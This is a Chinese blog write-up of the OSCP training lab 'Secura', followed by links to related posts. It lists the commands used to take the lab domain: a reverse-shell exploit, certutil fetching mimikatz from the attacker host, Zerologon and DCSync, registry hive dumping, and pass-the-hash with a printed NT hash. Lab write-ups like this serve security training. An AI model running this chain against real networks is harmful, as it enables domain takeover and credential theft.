OSCP Challenge 0 - Secura

已于 2025-03-31 15:05:50 修改
阅读量628 收藏 8
点赞数 5
文章标签: 安全 web安全
于 2025-03-31 15:04:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaochan_sara/article/details/146836530
版权

主机
192.168.217.97
192.168.217.96
192.168.217.95
一、首先nmap扫描三台机子
nmap -Pn 192.168.217.97



nmap -Pn 192.168.217.96


nmap -Pn 192.168.217.95



二、发现 192.168.217.95开启了web服务,用浏览器访问,点击First Time User看到用户名密码


登录进去查看到该产品的版本

在网上搜索该版本的漏洞



python 48793.py https://192.168.217.95:8443 admin admin 1192.168.45.190 4444
反弹shell成功





得到了95的flag



三、下载mimikatz到95上

certutil -urlcache -split -f http://192.168.45.190/mimikatz.exe C:\mimikatz.exe



利用zerologon漏洞
1.检测存在zerologon漏洞
mimikatz.exe "lsadump::zerologon /target:192.168.217.97 /account:DC01$" exit

2.置空域控机器账号HASH
注意:这种方法会导致域控脱域,必须尽快恢复
mimikatz.exe "lsadump::zerologon /target:192.168.217.97 /account:DC01$ /exploit" e
xit


3.获取域管HASH
lsadump::dcsync /domain:secura.yzx /dc:dc01 /user:administrator /authuser:DC01$ /authdomain:main /authpassword:"" /authntlm exit


4.恢复域控HASH

impacket-wmiexec -hashes :d38e7c66048f80fd9566ab85afca76b1 secura/administrator@192.168.217.97




获取注册表转储文件,默认存在目标机C:\目录下
/y:强制覆盖已存在文件
C:\>reg save HKLM\SYSTEM system.hive /y
C:\>reg save HKLM\SAM sam.hive /y
C:\>reg save HKLM\SECURITY security.hive /y


将转储文件,下载到本地
C:\>lget system.hive
C:\>lget sam.hive
C:\>lget security.hive



通过注册表转储导出HASH
impacket-secretsdump -sam sam.hive -system system.hive -security security.hive LOCAL




利用NT HASH恢复:
**工具 https://github.com/risksense/zerologon
python3 reinstall_original_pw.py DC01 192.168.217.97 aad3b435b51404eeaad3b435b51404ee

用域管直接登录96获取
impacket-wmiexec -hashes :d38e7c66048f80fd9566ab85afca76b1 secura/administrator@192.168.217.96

xiaochan_sara
关注
Challenge 5 - OSCP B
羽的博客
03-14 2147
jdwp可以执行命令,但是这个脚本需要python2来运行,靶机上没有,那么我们只能将8000端口代理出来了,我这里代理到我本地的7800端口上。访问8080端口显 hostname,我们通过nmap可以看到hostname为ms01.oscp.exam,修改/etc/hosts。试了下impacket-smbexec没有成功, 不过他开放了22端口,我们可以ssh登录web_svc用户。得到下面的结果,root用户运行了一个貌似是debug的进程。nmap扫描发现了一个可以的端口8021。
OSCP-Challenge 1 - Medtech
羽的博客
03-14 5348
122靶机进入/home/mario/.ssh目录下,发现存在id_rsa,用这个逐个登录内网靶机,发现14的成功进入。现在我们通过代理可以扫描内网的其他机器了,扫了下10-14、83、83开放的端口基本差不多,发现都有5985。如果可以看到的话,那就简单了,直接覆盖成shell文件就可以了,然后等待反弹。登录后发现限制了命令的执行,但是help了一下,发现了哪些可以用的命令。咨询了一下是dns的问题,修改dns的ip位域的ip,也就是10的ip。接着上mimikatz来获取一些明文信息,但是失败了。
OSCP 2023 challenge Writeup-Medtech
热门推荐
fuckskyboy的博客
08-26 1万+
OSCP lab writeup
OSCP-Challenge 2 - Relia
羽的博客
03-14 4126
使用andrea:PasswordPassword_6登录远程桌面,在c盘根目录下发现一个计划任务的ps,文件,修改执行的exe位木马,获取到milana用户的反弹shell。,发现开放了一个8000端口,但是我们外部是访问不到的,它对应的页面是/var/www/internal/,这个目录下的文件我们是可以访问的,把这个文件打个包放到本地分析下。其中数据的可以直接连接mssql,但是端口是49965,不过在数据库中没发现什么可用的信息,但是可以修改密码直接进后台,这个可以先放放。
OSCP Challenge 1 - Medtech
xiaochan_sara的博客
04-09 881
OSCP Challenge 1 - Medtech write up
Challenge 4 - OSCP A
羽的博客
03-14 3127
在c盘下发现一个windows.old,在里面可以找到SYSTEM和SAM文件,下载到本地,利用samdump2解密发现没解出来,再来试试pwdump.py(https://github.com/CiscoCXSecurity/creddump7)得到压缩包密码bludecode,解压之后发现一个比较特殊的文件configuration.php,里面有两个类似密码的字符串。登录之后在/opt/backups/下发现几个特殊文件,其中sitebackup3.zip是个正常的压缩包。但是这个压缩包是有密码的。
Challenge 6 - OSCP C
羽的博客
03-14 2004
开放了161端口,直接snmpbulkwalk扫描得到账号密码试了那几个web端口,发现可以登录8083的vesta,但是需要用户名大写Jack接着登录之后里面可以创建计划任务,直接弄个反弹shell,一分钟回弹。得到shell后,运行linpeas.sh提供了几个可能的漏洞,挨个试一下。
OSCP-Exam-Report-Template-Markdown 使用教程
gitblog_00375的博客
08-27 307
OSCP-Exam-Report-Template-Markdown 使用教程 OSCP-Exam-Report-Template-Markdown:orange_book: Markdown Templates for Offensive Security OSCP, OSWE, OSCE, OSEE, OSWP exam report项目地址:https://gitcode.com/gh_m...
引言:Client Hello 为何是 HTTPS 安全的核心?
2501_90994755的博客
05-10 721
Cipher Suites TLS_AES_256_GCM_SHA384 TLS 1.3 仅保留 5 个强密码套件,而 TLS 1.2 支持数十种(需谨慎过滤弱算法)openssl s_client -connect example.com:443 -tls1_3 # 手动测试 TLS 1.3。使用 TLS_RSA_WITH_3DES_EDE_CBC_SHA(3DES 算法已过时,易受 SWEET32 攻击)。欢迎在评论区分享经历!
端口安全讲解
rzy41880的博客
05-07 1324
‌MAC地址绑定机制‌端口安全通过记录连接到交换机端口的设备MAC地址,仅允许已授权的MAC地址通信。未绑定的设备接入时,系统会根据预设策略阻断或告警。‌安全MAC类型‌‌静态绑定‌:管理员手动配置允许的MAC地址列表;‌动态绑定‌:交换机自动学习首个接入设备的MAC地址并锁定;‌Sticky MAC‌:动态绑定基础上支持断电后保留绑定关系。类型定义特点安全动态MAC地址仅开启端口安全转换的MAC地址。设备重启后表项会丢失,需要重新学习。
PHP API安全设计四要素:构建坚不可摧的接口防护体系
最新发布
每日一贴
05-11 439
分层防御:不要依赖单一安全措施,采用多层次防护最小权限原则:只授予必要的API访问权限定期轮换密钥:定期更换API密钥和加密密钥详细日志记录:记录所有API请求用于审计和分析API版本控制:通过版本号管理接口变更输入验证:严格验证所有输入参数错误处理:避免暴露敏感信息的错误消息通过实施这些安全措施,您的PHP API将能够抵御大多数常见攻击,确保数据传输的安全性和完整性。
7.2.安全防御
2301_79902294的博客
05-07 954
• 密码存储:BCrypt与Argon2算法实现(Spring Security) • 多因素认证(MFA):TOTP集成(Google Authenticator API) • 生物识别安全:活体检测与本地存储(Android Biometric API)• 数据库加密:透明数据加密(TDE)、字段级加密(Jasypt) • 文件存储安全:权限控制(Linux ACL)、客户端加密(WebCrypto API) • 备份与恢复策略:异地加密备份(AWS S3 + KMS)-- 身份证号 -->
中级注册安全工程师的《安全生产专业实务》科目如何选择专业?
m0_60557936的博客
05-07 574
中级注册安全工程师的《安全生产专业实务》有 7 个专业方向,选择时可考虑以下几个方面:
渗透测试行业术语2
2301_76419201的博客
05-09 1329
内生安全有三个特性,即依靠信息化系统与安全系统的聚合、业务数据与安全数 据的聚合以及 IT 人才和安全人才的聚合,从信息化系统的内部,不断长出自适 应、自主和自成长的安全能力。根据 Gartner 的定义,威胁情报是某种基于证据的知识,包括上下文、机制、标 示、含义和能够执行的建议,这些知识与资产所面临已有的或酝酿中的威胁或危 害相关,可用于资产相关主体对威胁或危害的响应或处理决策提供信息支持。这样一来,这些浏览器所在的服务器跟用户所在环境中的终端和网络是隔离的, 从而使得客户所在网络的暴露面大大降低。
AI安全之对抗样本攻击---FGSM实战脚本解析
ccstuck的专栏
05-10 440
对抗样本(Adversarial Examples)是深度学习安全领域的重要研究课题,快速梯度符号方法(FGSM)是生成对抗样本的经典算法。FGSM通过沿梯度正方向施加扰动,构造出使模型产生错误判断的输入样本,同时确保扰动在人类视觉感知中与原始样本无明显差异。本文通过实战代码详细解析了FGSM的实现过程,包括输入参数配置、受攻击模型定义、FGSM攻击算法实现及测试函数。实验结果表明,随着扰动系数ε的增加,模型准确率显著下降,而扰动也逐渐变得可见。通过可视化对抗样本,展示了不同ε值下模型分类结果的变化,验证了
一种安全不泄漏、高效、免费的自动化脚本平台
m0_62259629的博客
05-09 1203
冰狐智能辅助(IceFoxIntelligentAssistant)是一款基于JavaScript的自动化脚本开发工具,旨在降低自动化开发门槛,适用于Android系统(7.0及以上)。其核心功能包括低代码开发、多场景覆盖、云服务集成和跨平台兼容,广泛应用于电商运营、社交媒体、游戏脚本等领域。冰狐智能辅助在安全性上采取多层次防护策略,如本地脚本存储与加密、隐私保护机制、权限精细化控制和卡密功能,确保用户数据与脚本内容的安全。其免费策略通过基础功能开放+增值服务收费实现可持续发展,核心功能零成本,社区生态支持
实时操作系统:航空电子系统的安全基石还是创新枷锁?
望获实时Linux系统
05-08 1677
实时操作系统的发展历程,实际上是一部在确定性、安全性、创新性之间寻求平衡的进化史。当我们站在 25000 米高空俯瞰这场技术革命,一方面要为纳秒级的时间精度、六个九的可靠性、开源社区的创造力等成就喝彩;另一方面也要保持清醒头脑,思考在 RTOS 赋能飞行器智能化的过程中,如何应对随之而来的安全挑战,以及在拥抱人工智能与量子计算等前沿技术时,如何守住航空安全的生命线。这些问题的答案将决定 RTOS 技术演进的未来方向,也将书写人类征服蓝天的下一段传奇。
限免开关实施版本保护措施,保证项目灰度发布安全
2301_78947898的博客
05-06 1120
 迭代用户限免权限校验业务 新增限免开关实现普通用户权益更新,实施版本保护措施,保证项目灰度发布安全
大数据狙击金融欺诈——技术如何守护交易安全
Echo_Wish
05-09 170
金融领域一直是欺诈行为的“重灾区”,从传统的信用卡盗刷到精心策划的网络诈骗,攻击者不断进化手法,使得防御变得越来越复杂。然而,**大数据技术**的出现,让金融欺诈检测从**被动防守**转向**主动狙击**,通过深度学习、行为分析和实时监控,金融机构得以识别复杂的欺诈模式,并在问题发生前预警。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值